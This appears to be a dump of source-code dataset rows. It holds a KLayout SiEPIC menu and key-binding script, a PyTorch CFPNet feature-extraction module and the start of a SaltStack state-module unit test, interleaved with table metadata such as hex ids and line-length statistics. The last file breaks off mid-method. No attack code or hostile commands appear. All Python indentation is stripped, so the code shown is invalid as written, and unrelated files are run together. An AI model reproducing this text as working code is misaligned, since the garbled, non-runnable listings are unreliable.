menu.insert_item("@toolbar.end", "coordinates", ACTIONS[count])
ACTIONS[count].title = "Testing\nCoordinates"
ACTIONS[count].on_triggered(scripts.auto_coord_extract)
ACTIONS[count].icon = path_test
count += 1
if 0:
if not(menu.is_menu("@toolbar.cir_sim.mc_sim")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.cir_sim.end", "mc_sim", ACTIONS[count])
ACTIONS[count].title = "INTERCONNECT Monte Carlo Simulations"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_monte_carlo)
ACTIONS[count].icon = path
count += 1
if not(menu.is_menu("@toolbar.cir_sim.launch_lumerical")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.cir_sim.end", "launch_lumerical", ACTIONS[count])
ACTIONS[count].title = "INTERCONNECT Circuit Simulation"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation)
ACTIONS[count].icon = path
count += 1
if not(menu.is_menu("@toolbar.cir_sim.update_netlist")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.cir_sim.end", "update_netlist", ACTIONS[count])
ACTIONS[count].title = "INTERCONNECT Update Netlist"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_update_netlist)
ACTIONS[count].icon = path
def registerKeyBindings():
import os
config = pya.Application.instance().get_config('key-bindings')
if config == '':
print('WARNING: get_config(key-bindings) returned null')
mapping = dict()
else:
mapping = dict(item.split(":") for item in config.split(";"))
mapping['edit_menu.clear_all_rulers'] = "'Ctrl+K'"
mapping['edit_menu.copy'] = "'Ctrl+C'"
mapping['edit_menu.cut'] = "'Ctrl+X'"
mapping['edit_menu.paste'] = "'Ctrl+V'"
mapping['edit_menu.redo'] = "'Ctrl+Y'"
mapping['edit_menu.undo'] = "'Ctrl+Z'"
mapping['edit_menu.delete'] = "'Del'"
# mapping['edit_menu.duplicate'] = "'Ctrl+B'"
mapping['edit_menu.mode_menu.move'] = "'M'"
mapping['edit_menu.mode_menu.ruler'] = "'R'"
mapping['edit_menu.mode_menu.select'] = "'S'"
mapping['edit_menu.mode_menu.box'] = "'B'"
mapping['edit_menu.mode_menu.instance'] = "'I'"
mapping['edit_menu.mode_menu.partial'] = "'L'"
mapping['edit_menu.mode_menu.path'] = "'P'"
mapping['edit_menu.mode_menu.polygon'] = "'G'"
mapping['edit_menu.mode_menu.text'] = "'X'"
mapping['edit_menu.select_menu.select_all'] = "'Shift+Ctrl+A'"
mapping['edit_menu.show_properties'] = "'Q'"
mapping['edit_menu.edit_options'] = "'E'"
mapping['edit_menu.selection_menu.change_layer'] = "'Shift+L'"
mapping['edit_menu.selection_menu.sel_flip_x'] = "'Shift+H'"
mapping['edit_menu.selection_menu.sel_flip_y'] = "'Shift+V'"
mapping['edit_menu.selection_menu.sel_move'] = "'Ctrl+M'"
mapping['edit_menu.selection_menu.sel_rot_ccw'] = "'Shift+R'"
mapping['edit_menu.selection_menu.sel_free_rot'] = "'Ctrl+Shift+R'"
mapping['edit_menu.selection_menu.flatten_insts'] = "'Ctrl+Shift+F'"
mapping['edit_menu.selection_menu.make_cell'] = "'Ctrl+Shift+M'"
# mapping['edit_menu.selection_menu.size'] = "'Z'"
# mapping['edit_menu.selection_menu.tap'] = "''"
mapping['file_menu.new_layout'] = "'Ctrl+N'"
mapping['file_menu.close'] = "'Ctrl+W'"
mapping['file_menu.open_new_panel'] = "'Ctrl+O'"
mapping['file_menu.open_same_panel'] = "'Ctrl+Shift+O'"
mapping['file_menu.save'] = "'Ctrl+S'"
mapping['file_menu.save_as'] = "'Ctrl+Shift+S'"
mapping['file_menu.screenshot'] = "'F12'"
# mapping['file_menu.setup'] = "'F4'"
mapping['macros_menu.macro_development'] = "'F5'"
mapping['zoom_menu.max_hier'] = "'Shift+F'"
mapping['zoom_menu.select_current_cell'] = "'Shift+S'" # Display > Show as new top
mapping['zoom_menu.zoom_fit'] = "'F'"
mapping['zoom_menu.zoom_fit_sel'] = "'Shift+F2'"
mapping['zoom_menu.zoom_in'] = "'Return'"
mapping['zoom_menu.zoom_out'] = "'Shift+Return'"
# turn the hash back into a config string
config = ''.join('{}:{};'.format(key, val) for key, val in sorted(mapping.items()))[:-1]
pya.Application.instance().set_config('key-bindings', config)
pya.Application.instance().set_config('edit-connect-angle-mode', 'ortho')
pya.Application.instance().set_config('edit-inst-angle', '0')
pya.Application.instance().set_config('edit-move-angle-mode', 'diagonal')
pya.Application.instance().set_config('edit-snap-to-objects', 'true')
pya.Application.instance().set_config('grid-micron', '0.01')
pya.Application.instance().set_config('edit-top-level-selection', 'true')
pya.Application.instance().set_config('inst-color', '#ffcdcd')
pya.Application.instance().set_config('text-font', '3')
pya.Application.instance().set_config('guiding-shape-line-width', '0')
pya.Application.instance().set_config('rdb-marker-color', '#ff0000')
pya.Application.instance().set_config('rdb-marker-line-width', '8')
# pya.Application.instance().set_config('default-layer-properties', os.path.join(os.path.realpath(__file__), os.pardir, os.pardir, os.pardir, 'libraries', 'klayout_Layers_EBeam.lyp'))
if pya.Application.instance().get_config('edit-mode') == 'false':
pya.Application.instance().set_config('edit-mode', 'true')
pya.MessageBox.warning(
"Restart", "Please restart KLayout. SiEPIC settings have been applied.", pya.MessageBox.Ok)
| 43.115789 | 186 | 0.644775 | import pya
def registerMenuItems():
import os
from . import scripts, lumerical, install
import SiEPIC.__init__
global ACTIONS
count = 0
menu = pya.Application.instance().main_window().menu()
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"files", "INTERCONNECT_icon.png")
path_flv = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"files", "flv_icon.png")
path_test = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"files", "test_icon.png")
import sys
if int(sys.version[0]) > 2 and sys.platform == 'darwin':
extra = " Py3"
else:
extra = " Py2"
s1 = "siepic_menu"
if not(menu.is_menu(s1)):
menu.insert_menu("help_menu", s1, "SiEPIC %s" % SiEPIC.__init__.__version__ + extra)
s2 = "waveguides"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Waveguides")
s2 = "metal"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Metal")
s2 = "layout"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Layout")
s2 = "exlayout"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Example Layouts")
s2 = "verification"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Verification")
s2 = "simulation_circuits"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Simulation, Circuits")
s2 = "simulation_components"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Simulation, Components")
s2 = "measurements"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Measurement Data")
if not(menu.is_menu("@toolbar.cir_sim")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.end", "cir_sim", ACTIONS[count])
ACTIONS[count].title = "Circuit \nSimulation"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_toolbar)
ACTIONS[count].icon = path
count += 1
if not(menu.is_menu("@toolbar.verification")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.end", "verification", ACTIONS[count])
ACTIONS[count].title = "Functional\nVerification"
ACTIONS[count].on_triggered(scripts.layout_check)
ACTIONS[count].icon = path_flv
count += 1
if not(menu.is_menu("@toolbar.coordinates")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.end", "coordinates", ACTIONS[count])
ACTIONS[count].title = "Testing\nCoordinates"
ACTIONS[count].on_triggered(scripts.auto_coord_extract)
ACTIONS[count].icon = path_test
count += 1
if 0:
if not(menu.is_menu("@toolbar.cir_sim.mc_sim")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.cir_sim.end", "mc_sim", ACTIONS[count])
ACTIONS[count].title = "INTERCONNECT Monte Carlo Simulations"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_monte_carlo)
ACTIONS[count].icon = path
count += 1
if not(menu.is_menu("@toolbar.cir_sim.launch_lumerical")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.cir_sim.end", "launch_lumerical", ACTIONS[count])
ACTIONS[count].title = "INTERCONNECT Circuit Simulation"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation)
ACTIONS[count].icon = path
count += 1
if not(menu.is_menu("@toolbar.cir_sim.update_netlist")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.cir_sim.end", "update_netlist", ACTIONS[count])
ACTIONS[count].title = "INTERCONNECT Update Netlist"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_update_netlist)
ACTIONS[count].icon = path
def registerKeyBindings():
import os
config = pya.Application.instance().get_config('key-bindings')
if config == '':
print('WARNING: get_config(key-bindings) returned null')
mapping = dict()
else:
mapping = dict(item.split(":") for item in config.split(";"))
mapping['edit_menu.clear_all_rulers'] = "'Ctrl+K'"
mapping['edit_menu.copy'] = "'Ctrl+C'"
mapping['edit_menu.cut'] = "'Ctrl+X'"
mapping['edit_menu.paste'] = "'Ctrl+V'"
mapping['edit_menu.redo'] = "'Ctrl+Y'"
mapping['edit_menu.undo'] = "'Ctrl+Z'"
mapping['edit_menu.delete'] = "'Del'"
mapping['edit_menu.mode_menu.move'] = "'M'"
mapping['edit_menu.mode_menu.ruler'] = "'R'"
mapping['edit_menu.mode_menu.select'] = "'S'"
mapping['edit_menu.mode_menu.box'] = "'B'"
mapping['edit_menu.mode_menu.instance'] = "'I'"
mapping['edit_menu.mode_menu.partial'] = "'L'"
mapping['edit_menu.mode_menu.path'] = "'P'"
mapping['edit_menu.mode_menu.polygon'] = "'G'"
mapping['edit_menu.mode_menu.text'] = "'X'"
mapping['edit_menu.select_menu.select_all'] = "'Shift+Ctrl+A'"
mapping['edit_menu.show_properties'] = "'Q'"
mapping['edit_menu.edit_options'] = "'E'"
mapping['edit_menu.selection_menu.change_layer'] = "'Shift+L'"
mapping['edit_menu.selection_menu.sel_flip_x'] = "'Shift+H'"
mapping['edit_menu.selection_menu.sel_flip_y'] = "'Shift+V'"
mapping['edit_menu.selection_menu.sel_move'] = "'Ctrl+M'"
mapping['edit_menu.selection_menu.sel_rot_ccw'] = "'Shift+R'"
mapping['edit_menu.selection_menu.sel_free_rot'] = "'Ctrl+Shift+R'"
mapping['edit_menu.selection_menu.flatten_insts'] = "'Ctrl+Shift+F'"
mapping['edit_menu.selection_menu.make_cell'] = "'Ctrl+Shift+M'"
mapping['file_menu.new_layout'] = "'Ctrl+N'"
mapping['file_menu.close'] = "'Ctrl+W'"
mapping['file_menu.open_new_panel'] = "'Ctrl+O'"
mapping['file_menu.open_same_panel'] = "'Ctrl+Shift+O'"
mapping['file_menu.save'] = "'Ctrl+S'"
mapping['file_menu.save_as'] = "'Ctrl+Shift+S'"
mapping['file_menu.screenshot'] = "'F12'"
mapping['macros_menu.macro_development'] = "'F5'"
mapping['zoom_menu.max_hier'] = "'Shift+F'"
mapping['zoom_menu.select_current_cell'] = "'Shift+S'"
mapping['zoom_menu.zoom_fit'] = "'F'"
mapping['zoom_menu.zoom_fit_sel'] = "'Shift+F2'"
mapping['zoom_menu.zoom_in'] = "'Return'"
mapping['zoom_menu.zoom_out'] = "'Shift+Return'"
config = ''.join('{}:{};'.format(key, val) for key, val in sorted(mapping.items()))[:-1]
pya.Application.instance().set_config('key-bindings', config)
pya.Application.instance().set_config('edit-connect-angle-mode', 'ortho')
pya.Application.instance().set_config('edit-inst-angle', '0')
pya.Application.instance().set_config('edit-move-angle-mode', 'diagonal')
pya.Application.instance().set_config('edit-snap-to-objects', 'true')
pya.Application.instance().set_config('grid-micron', '0.01')
pya.Application.instance().set_config('edit-top-level-selection', 'true')
pya.Application.instance().set_config('inst-color', '#ffcdcd')
pya.Application.instance().set_config('text-font', '3')
pya.Application.instance().set_config('guiding-shape-line-width', '0')
pya.Application.instance().set_config('rdb-marker-color', '#ff0000')
pya.Application.instance().set_config('rdb-marker-line-width', '8')
if pya.Application.instance().get_config('edit-mode') == 'false':
pya.Application.instance().set_config('edit-mode', 'true')
pya.MessageBox.warning(
"Restart", "Please restart KLayout. SiEPIC settings have been applied.", pya.MessageBox.Ok)
| true | true |
f72351ccd603f3f141ef47bf33cce0ab32b980df | 8,829 | py | Python | models/CFPNet/submodule.py | wangqingyu985/OpenStereo | 91d605357d65281b99b0d8cf45e3f15f0543c9fa | [
"MIT"
] | 3 | 2021-11-30T12:10:22.000Z | 2022-03-30T07:02:33.000Z | models/CFPNet/submodule.py | wangqingyu985/OpenStereo | 91d605357d65281b99b0d8cf45e3f15f0543c9fa | [
"MIT"
] | null | null | null | models/CFPNet/submodule.py | wangqingyu985/OpenStereo | 91d605357d65281b99b0d8cf45e3f15f0543c9fa | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
def convbn(in_planes, out_planes, kernel_size, stride, pad, dilation):
return nn.Sequential(nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=dilation if dilation > 1 else pad, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes)
)
def convbn_3d(in_planes, out_planes, kernel_size, stride, pad):
return nn.Sequential(nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size, padding=pad, stride=stride, bias=False),
nn.BatchNorm3d(out_planes)
)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, kernel_size, stride, downsample, pad, dilation):
super(BasicBlock, self).__init__()
self.conv1 = nn.Sequential(convbn(inplanes, planes, kernel_size, stride, pad, dilation),
nn.ReLU(inplace=True)
)
self.conv2 = convbn(planes, planes, kernel_size, 1, pad, dilation)
self.stride = stride
self.downsample = downsample
def forward(self, x):
out = self.conv1(x)
out = self.conv2(out)
if self.downsample is not None:
x = self.downsample(x)
out += x
return out
class matchshifted(nn.Module):
def __init__(self):
super(matchshifted, self).__init__()
def forward(self, left, right, shift):
batch, filters, height, width = left.size()
shifted_left = F.pad(torch.index_select(left, 3, Variable(torch.LongTensor([i for i in range(shift, width)])).cuda()), (shift, 0, 0, 0))
shifted_right = F.pad(torch.index_select(right, 3, Variable(torch.LongTensor([i for i in range(width-shift)])).cuda()), (shift, 0, 0, 0))
out = torch.cat((shifted_left, shifted_right), 1).view(batch, filters*2, 1, height, width)
return out
class disparityregression(nn.Module):
def __init__(self, maxdisp):
super(disparityregression, self).__init__()
self.disp = Variable(torch.Tensor(np.reshape(np.array(range(maxdisp)), [1, maxdisp, 1, 1])).cuda(), requires_grad=False)
def forward(self, x):
disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])
out = torch.sum(x*disp, 1)
return out
class feature_extraction(nn.Module):
def __init__(self):
super(feature_extraction, self).__init__()
self.inplanes = 32
self.layer0 = nn.Sequential(convbn(in_planes=3, out_planes=32, kernel_size=3, stride=1, pad=1, dilation=1),
nn.ReLU(inplace=True)
)
self.layer1 = self._make_layer(block=BasicBlock, planes=32, blocks=3, kernel_size=3, stride=2, pad=1, dilation=1, order=1)
self.layer2 = self._make_layer(BasicBlock, 64, 8, 3, 2, 1, 1, 1)
self.layer3 = self._make_layer(BasicBlock, 128, 3, 3, 2, 1, 1, 2)
self.layer1_after = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer2_after = nn.Sequential(convbn(32, 64, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer3_after = nn.Sequential(convbn(64, 128, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer1_final = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.dilat1 = nn.Sequential(convbn(128, 32, 3, 1, 1, 32),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.dilat2 = nn.Sequential(convbn(128, 32, 3, 1, 1, 16),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.dilat3 = nn.Sequential(convbn(128, 32, 3, 1, 1, 8),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 4),
nn.ReLU(inplace=True))
self.dilat4 = nn.Sequential(convbn(128, 32, 3, 1, 1, 6),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.concat_dilate_pool = nn.Sequential(convbn(64, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1, bias=False))
self.lastconv = nn.Sequential(convbn(352, 128, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(128, 32, kernel_size=1, padding=0, stride=1, bias=False))
def _make_layer(self, block, planes, blocks, kernel_size, stride, pad, dilation, order):
downsample = None
if stride != 1:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes * order, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),)
layers = []
layers.append(block(self.inplanes*order, planes, kernel_size, stride, downsample, pad, dilation))
if blocks != 1:
for i in range(1, blocks):
layers.append(block(planes, planes, kernel_size, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x):
out_0 = self.layer0(x)
out_1 = self.layer1(out_0)
out_1_a = self.layer1_after(out_0)
out_1 = out_1 + out_1_a
out_2 = self.layer2(out_1)
out_2_a = self.layer2_after(out_1)
out_2 = out_2 + out_2_a
out_3 = self.layer3(out_2)
out_3_a = self.layer3_after(out_2)
out_3 = out_3 + out_3_a
out_1 = self.layer1_final(out_1)
inPooling = F.upsample(out_3, (out_2.size()[2], out_2.size()[3]), mode='bilinear')
#Pooling
output_dilate1 = self.dilat1(inPooling)
output_dilate2 = self.dilat2(inPooling)
output_dilate3 = self.dilat3(inPooling)
output_dilate4 = self.dilat4(inPooling)
output_branch1 = self.branch1(inPooling)
output_branch1 = F.upsample(output_branch1, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch2 = self.branch2(inPooling)
output_branch2 = F.upsample(output_branch2, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch3 = self.branch3(inPooling)
output_branch3 = F.upsample(output_branch3, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch4 = self.branch4(inPooling)
output_branch4 = F.upsample(output_branch4, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
#concat dilate and avgpool
out_fusion1 = torch.cat((output_dilate1, output_branch1), 1)
out_fusion1 = self.concat_dilate_pool(out_fusion1)
out_fusion2 = torch.cat((output_dilate2, output_branch2), 1)
out_fusion2 = self.concat_dilate_pool(out_fusion2)
out_fusion3 = torch.cat((output_dilate3, output_branch3), 1)
out_fusion3 = self.concat_dilate_pool(out_fusion3)
out_fusion4 = torch.cat((output_dilate4, output_branch4), 1)
out_fusion4 = self.concat_dilate_pool(out_fusion4)
output_feature = torch.cat((out_1, out_2, inPooling, out_fusion1, out_fusion2, out_fusion3, out_fusion4), 1)
output_feature = self.lastconv(output_feature)
return output_feature
| 45.746114 | 172 | 0.557368 | from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
def convbn(in_planes, out_planes, kernel_size, stride, pad, dilation):
return nn.Sequential(nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=dilation if dilation > 1 else pad, dilation=dilation, bias=False),
nn.BatchNorm2d(out_planes)
)
def convbn_3d(in_planes, out_planes, kernel_size, stride, pad):
return nn.Sequential(nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size, padding=pad, stride=stride, bias=False),
nn.BatchNorm3d(out_planes)
)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, kernel_size, stride, downsample, pad, dilation):
super(BasicBlock, self).__init__()
self.conv1 = nn.Sequential(convbn(inplanes, planes, kernel_size, stride, pad, dilation),
nn.ReLU(inplace=True)
)
self.conv2 = convbn(planes, planes, kernel_size, 1, pad, dilation)
self.stride = stride
self.downsample = downsample
def forward(self, x):
out = self.conv1(x)
out = self.conv2(out)
if self.downsample is not None:
x = self.downsample(x)
out += x
return out
class matchshifted(nn.Module):
def __init__(self):
super(matchshifted, self).__init__()
def forward(self, left, right, shift):
batch, filters, height, width = left.size()
shifted_left = F.pad(torch.index_select(left, 3, Variable(torch.LongTensor([i for i in range(shift, width)])).cuda()), (shift, 0, 0, 0))
shifted_right = F.pad(torch.index_select(right, 3, Variable(torch.LongTensor([i for i in range(width-shift)])).cuda()), (shift, 0, 0, 0))
out = torch.cat((shifted_left, shifted_right), 1).view(batch, filters*2, 1, height, width)
return out
class disparityregression(nn.Module):
def __init__(self, maxdisp):
super(disparityregression, self).__init__()
self.disp = Variable(torch.Tensor(np.reshape(np.array(range(maxdisp)), [1, maxdisp, 1, 1])).cuda(), requires_grad=False)
def forward(self, x):
disp = self.disp.repeat(x.size()[0], 1, x.size()[2], x.size()[3])
out = torch.sum(x*disp, 1)
return out
class feature_extraction(nn.Module):
def __init__(self):
super(feature_extraction, self).__init__()
self.inplanes = 32
self.layer0 = nn.Sequential(convbn(in_planes=3, out_planes=32, kernel_size=3, stride=1, pad=1, dilation=1),
nn.ReLU(inplace=True)
)
self.layer1 = self._make_layer(block=BasicBlock, planes=32, blocks=3, kernel_size=3, stride=2, pad=1, dilation=1, order=1)
self.layer2 = self._make_layer(BasicBlock, 64, 8, 3, 2, 1, 1, 1)
self.layer3 = self._make_layer(BasicBlock, 128, 3, 3, 2, 1, 1, 2)
self.layer1_after = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer2_after = nn.Sequential(convbn(32, 64, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer3_after = nn.Sequential(convbn(64, 128, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.layer1_final = nn.Sequential(convbn(32, 32, 3, 2, 1, 1),
nn.ReLU(inplace=True))
self.dilat1 = nn.Sequential(convbn(128, 32, 3, 1, 1, 32),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.dilat2 = nn.Sequential(convbn(128, 32, 3, 1, 1, 16),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.dilat3 = nn.Sequential(convbn(128, 32, 3, 1, 1, 8),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 4),
nn.ReLU(inplace=True))
self.dilat4 = nn.Sequential(convbn(128, 32, 3, 1, 1, 6),
nn.ReLU(inplace=True),
convbn(32, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True))
self.branch1 = nn.Sequential(nn.AvgPool2d((64, 64), stride=(64, 64)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch2 = nn.Sequential(nn.AvgPool2d((32, 32), stride=(32, 32)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch3 = nn.Sequential(nn.AvgPool2d((16, 16), stride=(16, 16)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.branch4 = nn.Sequential(nn.AvgPool2d((8, 8), stride=(8, 8)),
convbn(128, 32, 1, 1, 0, 1),
nn.ReLU(inplace=True))
self.concat_dilate_pool = nn.Sequential(convbn(64, 32, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1, bias=False))
self.lastconv = nn.Sequential(convbn(352, 128, 3, 1, 1, 1),
nn.ReLU(inplace=True),
nn.Conv2d(128, 32, kernel_size=1, padding=0, stride=1, bias=False))
def _make_layer(self, block, planes, blocks, kernel_size, stride, pad, dilation, order):
downsample = None
if stride != 1:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes * order, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),)
layers = []
layers.append(block(self.inplanes*order, planes, kernel_size, stride, downsample, pad, dilation))
if blocks != 1:
for i in range(1, blocks):
layers.append(block(planes, planes, kernel_size, 1, None, pad, dilation))
return nn.Sequential(*layers)
def forward(self, x):
out_0 = self.layer0(x)
out_1 = self.layer1(out_0)
out_1_a = self.layer1_after(out_0)
out_1 = out_1 + out_1_a
out_2 = self.layer2(out_1)
out_2_a = self.layer2_after(out_1)
out_2 = out_2 + out_2_a
out_3 = self.layer3(out_2)
out_3_a = self.layer3_after(out_2)
out_3 = out_3 + out_3_a
out_1 = self.layer1_final(out_1)
inPooling = F.upsample(out_3, (out_2.size()[2], out_2.size()[3]), mode='bilinear')
output_dilate1 = self.dilat1(inPooling)
output_dilate2 = self.dilat2(inPooling)
output_dilate3 = self.dilat3(inPooling)
output_dilate4 = self.dilat4(inPooling)
output_branch1 = self.branch1(inPooling)
output_branch1 = F.upsample(output_branch1, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch2 = self.branch2(inPooling)
output_branch2 = F.upsample(output_branch2, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch3 = self.branch3(inPooling)
output_branch3 = F.upsample(output_branch3, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
output_branch4 = self.branch4(inPooling)
output_branch4 = F.upsample(output_branch4, (inPooling.size()[2], inPooling.size()[3]), mode='bilinear')
out_fusion1 = torch.cat((output_dilate1, output_branch1), 1)
out_fusion1 = self.concat_dilate_pool(out_fusion1)
out_fusion2 = torch.cat((output_dilate2, output_branch2), 1)
out_fusion2 = self.concat_dilate_pool(out_fusion2)
out_fusion3 = torch.cat((output_dilate3, output_branch3), 1)
out_fusion3 = self.concat_dilate_pool(out_fusion3)
out_fusion4 = torch.cat((output_dilate4, output_branch4), 1)
out_fusion4 = self.concat_dilate_pool(out_fusion4)
output_feature = torch.cat((out_1, out_2, inPooling, out_fusion1, out_fusion2, out_fusion3, out_fusion4), 1)
output_feature = self.lastconv(output_feature)
return output_feature
| true | true |
f72351f070b50e290e8199d1fb8860afa7776925 | 37,857 | py | Python | tests/unit/modules/test_state.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 1 | 2021-08-14T13:48:38.000Z | 2021-08-14T13:48:38.000Z | tests/unit/modules/test_state.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 3 | 2015-03-31T14:44:05.000Z | 2015-06-18T19:02:24.000Z | tests/unit/modules/test_state.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Rahul Handay <rahulha@saltstack.com>`
'''
# Import Python libs
from __future__ import absolute_import
import os
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
MagicMock,
patch,
mock_open,
NO_MOCK,
NO_MOCK_REASON
)
# Import Salt Libs
import salt.config
import salt.loader
import salt.utils.hashutils
import salt.utils.odict
import salt.utils.platform
import salt.modules.state as state
from salt.exceptions import SaltInvocationError
from salt.ext import six
class MockState(object):
'''
Mock class
'''
def __init__(self):
pass
class State(object):
'''
Mock state class
'''
flag = None
def __init__(self,
opts,
pillar_override=False,
pillar_enc=None,
initial_pillar=None):
pass
def verify_data(self, data):
'''
Mock verify_data method
'''
data = data
if self.flag:
return True
else:
return False
@staticmethod
def call(data):
'''
Mock call method
'''
data = data
return list
@staticmethod
def call_high(data, orchestration_jid=None):
'''
Mock call_high method
'''
data = data
return True
@staticmethod
def call_template_str(data):
'''
Mock call_template_str method
'''
data = data
return True
@staticmethod
def _mod_init(data):
'''
Mock _mod_init method
'''
data = data
return True
def verify_high(self, data):
'''
Mock verify_high method
'''
data = data
if self.flag:
return True
else:
return -1
@staticmethod
def compile_high_data(data):
'''
Mock compile_high_data
'''
data = data
return [{"__id__": "ABC"}]
@staticmethod
def call_chunk(data, data1, data2):
'''
Mock call_chunk method
'''
data = data
data1 = data1
data2 = data2
return {'': 'ABC'}
@staticmethod
def call_chunks(data):
'''
Mock call_chunks method
'''
data = data
return True
@staticmethod
def call_listen(data, ret):
'''
Mock call_listen method
'''
data = data
ret = ret
return True
def requisite_in(self, data): # pylint: disable=unused-argument
return data, []
class HighState(object):
'''
Mock HighState class
'''
flag = False
opts = {'state_top': '',
'pillar': {}}
def __init__(self, opts, pillar_override=None, *args, **kwargs):
self.building_highstate = salt.utils.odict.OrderedDict
self.state = MockState.State(opts,
pillar_override=pillar_override)
def render_state(self, sls, saltenv, mods, matches, local=False):
'''
Mock render_state method
'''
sls = sls
saltenv = saltenv
mods = mods
matches = matches
local = local
if self.flag:
return {}, True
else:
return {}, False
@staticmethod
def get_top():
'''
Mock get_top method
'''
return "_top"
def verify_tops(self, data):
'''
